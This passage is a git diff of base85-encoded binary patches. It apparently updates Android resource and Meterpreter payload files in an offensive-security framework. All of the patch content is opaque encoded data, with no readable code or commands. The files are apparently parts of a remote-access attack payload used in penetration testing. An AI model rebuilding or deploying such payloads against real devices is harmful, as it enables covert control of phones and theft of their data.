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
Bch3L-

literal 10040
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
ZsX3tYnD~1>g3f)(?;X(&kDGu0_WuA*Bwqjk

diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc
index 03f6c44d2873fe60ae877cb150946896a918e315..0ef9aa31f6c93645717d0e187c8651e0a63b6f08 100644
GIT binary patch
delta 47
ycmX@Ya)O1GiGhc~V<M|N69dymzYUDS77RWN3=B*_%m~CbK&&#cQGK!rlK=q5tOtz%

delta 47
ycmX@Xa)gDIiGhc~Wg@FP(;vo-ej6BtO&B~F7#Ns<m=TCAfLLK-qw-`6CIJBDSO|0g

diff --git a/data/android/meterpreter.jar b/data/android/meterpreter.jar
index 35e3ddf6b59e4e64cc94d4ea8c4a8aebfaaed930..1c87408103615072697651aebf3868d6b2f68b79 100644
GIT binary patch
delta 40808
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
